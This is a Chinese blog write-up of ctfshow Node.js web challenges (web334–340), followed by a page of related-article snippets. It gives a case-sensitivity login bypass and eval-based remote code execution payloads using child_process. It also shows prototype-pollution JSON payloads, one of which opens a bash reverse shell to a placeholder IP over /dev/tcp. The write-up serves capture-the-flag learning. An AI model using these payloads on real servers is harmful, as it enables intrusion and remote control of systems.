ctfshow_nodejs

已于 2022-06-14 22:48:08 修改
阅读量281 收藏
点赞数
分类专栏: # web 文章标签: node.js
于 2021-03-13 15:27:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/114733965
版权

这里写目录标题

web334

打开题目下载源码
打开longin.js


var express = require('express');
var router = express.Router();
var users = require('../modules/user').items;
 
var findUser = function(name, password){
  return users.find(function(item){
    return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;
  });
};

/* GET home page. */
router.post('/', function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var sess = req.session;
  var user = findUser(req.body.username, req.body.password);
 
  if(user){
    req.session.regenerate(function(err) {
      if(err){
        return res.json({ret_code: 2, ret_msg: '登录失败'});        
      }
       
      req.session.loginUser = user.username;
      res.json({ret_code: 0, ret_msg: '登录成功',ret_flag:flag});              
    });
  }else{
    res.json({ret_code: 1, ret_msg: '账号或密码错误'});
  }  
  
});

module.exports = router;

user.js

module.exports = {
  items: [
    {username: 'CTFSHOW', password: '123456'}
  ]
};

这里账号密码直接有了,但是我们拿去登入发现并不是正确的密码,接下来我们去分析源代码,这里判断密码主要是这一句

name!==‘CTFSHOW’ && item.username === name.toUpperCase() && item.password === password;

这里追一下name从哪里来的.

var user = findUser(req.body.username, req.body.password)

这里发现是用户输入,所以这里的意思是输入的密码不能是CTFSHOW,然后输入的用户转换成大写要等于CTFSHOW,所以这里我们直接小写即可。

web335

打开网站查看源代码,发现一个提示
在这里插入图片描述
发现可能会有rce远程代码执行,这里可以先看看这篇文章child_process(子进程)

方法一

payload=require(‘child_process’).execSync(‘ls’)

查询到文件
在这里插入图片描述
接下来cat一下即可。

方法二

payload=http://d34c519b-4379-4f59-98b5-b3abca84b886.challenge.ctf.show:8080/?eval=require( ‘child_process’ ).spawnSync( ‘ls’, [ ‘/’ ] ).stdout.toString()

这里注意一定要加stdout.toString,不然就是这样的
在这里插入图片描述

在这里插入图片描述

web336

这里跟上题还是一样的,但是可能过滤一些东西.
在这里插入图片描述
这里我们还有方法二可以试一下.

payload=require( ‘child_process’ ).spawnSync( ‘ls’, [ ‘/’ ] ).stdout.toString()

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

web338

这一题是原型链污染,我是从p神文章学到的深入理解 JavaScript Prototype 污染攻击
这题直接打就是了

{"__proto__":{"ctfshow":"36dboy"}}

在这里插入图片描述

web339

web340 原型链污染++

主要的代码在这里
在这里插入图片描述

在这里插入图片描述

var flag=‘flag_here’;
var user = new function(){
this.userinfo = new function(){
this.isVIP = false;
this.isAdmin = false;
this.isAuthor = false;
};
}
utils.copy(user.userinfo,req.body);
if(user.userinfo.isAdmin){
res.end(flag);
}else{
return res.json({ret_code: 2, ret_msg: ‘登录失败’});
}

这一题相对上一题,就是要污染两层才可以利用
在这里插入图片描述
这里浏览器可以看到,这边的userinfo的原型不是object对象,要再往下一层才是,所以就有了这个poc

{“proto”:{“proto”:{“query”:“return global.process.mainModule.constructor._load(‘child_process’).exec(‘bash -c “bash -i >& /dev/tcp/XXX.XXX.XXX.XXX/6666 0>&1”’)”}}}

在这里插入图片描述

multi4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
goja_nodejs:Goja的Nodejs兼容性库
05-08
Goja的Nodejs兼容性库这是提供nodejs兼容性的Goja模块的集合。 例子: package mainimport ( "github.com/dop251/goja" "github.com/dop251/goja_nodejs/require")func main () { registry := new (require. ...
node的child_processexecSync方法调用cmd报错
热门推荐
南山老沙
01-08 1万+
const { execSync } = require('child_process'); execSync('./node_modules/.bin/babel plugins/router-generator/src --out-dir plugins/router-generator/dist') node执行该代码,在Mac执行没问题,但在win10执行,则报错: '.' 不是内部或外...
Node.js 之 — Child process
weixin_49067499的博客
08-01 1328
Node.js 中,child_process 模块提供了可以创建子进程的能力,类似于 linux 中的 popen。通过子进程,你可以去执行操作系统上的命令。另外,child_process 还提供了执行其他 js 文件的特性。 child_process 模块中,最主要的特性就是创建子进程,其提供了四种创建子进程的方法:execexecFile、fork、spawn。当然这四种方式都是异步的创建子进程的方式,除了 fork 没有对应同步方法,其他对应的同步方法为:execSyncexecFile
网络安全最全CTFShow-电子取证篇Writeup_ctfshow 电子取证,2024年最新最新网络安全面试合集
最新发布
2401_84252820的博客
05-14 937
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
ctfshow Nodejs
weixin_63231007的博客
03-08 648
承接上文nodejs原型链漏洞刷题练习
ctfshow web入门 nodejs 334-341(更新中)
m0_64815693的博客
04-11 1452
ctfshow web入门 nodejs 334-341(更新中)
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 2266
纯粹学安全
OnlineCoffeeShop_NodeJS
07-10
OnlineCoffeeShop_NodeJS 一家虚构的咖啡公司的在线咖啡店。 用户可以创建帐户、登录、注销以及将商品添加到他们的购物车中。 使用 NodeJS、JavaScript、Jade 模板和 CSS 构建。 以 MySQL 数据库为后盾。设置您必须...
rules_nodejs:BazelJavaScript和NodeJS规则
02-04
nodejs规则将NodeJS开发工具链和运行时与Bazel集成在一起。 该工具链可用于构建针对浏览器运行时的应用程序,因此该存储库也可被视为“ BazelJavaScript规则”。 (如果重命名不太破坏性,我们将其称为rules_...
ghidra_nodejs:GHIDRA插件,用于解析,反汇编和反编译NodeJS Bytenode(JSC)二进制文件
03-05
ghidra_nodejs 描述 GHIDRA插件,用于解析,反汇编和反编译NodeJS Bytenode(JSC)二进制文件。 支持的NodeJS版本: v8.16.0(x64)(V8版本:6.2.414.77) v8.16.0(x86)(V8版本:6.2.414.77) 制作说明 克隆...
Nodejs Server+TCP+UDP_nodejs_TCP/IP_UDP_源码
09-30
简单的说 Node.js 就是运行在服务端的 JavaScript。Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台。本例程是基于Nodejs平台的TCP/IP通讯和UDP通讯示例
ctfshow(web入门)
qq_62553635的博客
01-15 1623
第三题 根据提示直接bp抓包 发送到repeater查看响应包 得flag
CTFShow-Web入门
weixin_58546222的博客
12-04 2313
CTFShow-信息收集
CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)
路baby的博客
02-10 1万+
CTFshow菜狗-misc-wp(详解 脚本 过程 全) 所以misc 杂项签到 损坏的压缩包 谜之栅栏 你会数数吗 你会异或吗flag一分为二 我是谁?? You and me 7.1.05 黑丝白丝还有什么丝? 我吐了你随意这是个什么文件? 抽象画 迅疾响应 我可没有骗你 你被骗了 一闪一闪亮晶晶 一层一层一层地剥开我的◇ 打不开的图片
CTFshow-Web入门-Web1-20 (信息收集完结篇)
m0_61155226的博客
03-07 7668
CTFshow-Web入门-Web11-20 (信息收集完结篇)
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3872
ctfshow 每周大挑战 极限命令执行 wp
ctfshow_web入门_nodejs
qq_62989306的博客
01-21 414
javascript大小写特性、javascript的RCE、javascript变量、javascript原型链污染、ejs rce、jade原型链污染、http参数污染……
CTFshow 1-10关
weixin_62369433的博客
11-11 2165
CTFshow 1-10 通关详解
CTFshow 菜狗杯 web方向 全
Jay17的博客
09-01 2402
CTFshow 菜狗杯 web方向 全
nodejs shell 调用_NodeJS调用shell命令
06-01
Node.js中,可以使用child_process模块来调用Shell命令。该模块提供了spawn()、exec()、execFile()等方法,可以方便地执行Shell命令并获取其输出。 以下是一个简单的示例,演示如何在Node.js中调用Shell命令并将其输出打印到控制台: ```javascript const { spawn } = require('child_process'); const ls = spawn('ls', ['-lh', '/usr']); ls.stdout.on('data', (data) => { console.log(`输出:${data}`); }); ls.stderr.on('data', (data) => { console.error(`错误:${data}`); }); ls.on('close', (code) => { console.log(`子进程退出码:${code}`); }); ``` 在上面的示例中,我们使用spawn()方法来调用Shell命令“ls -lh /usr”,并将其输出打印到控制台。该方法返回一个ChildProcess对象,该对象具有stdout、stderr和stdin属性,可以分别用于读取输出、错误和写入输入。我们使用on()方法来监听stdout和stderr事件,以便在数据可用时获取它们的值。最后,我们使用on()方法来监听close事件,以获取子进程的退出码。 除了spawn()之外,exec()和execFile()方法也可以用于调用Shell命令。exec()方法用于执行任意Shell命令,并返回stdout和stderr的缓冲区。execFile()方法用于执行可执行文件,类似于spawn()方法,但是可以传递一个命令行参数数组。 希望这能帮助你在Node.js中调用Shell命令!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值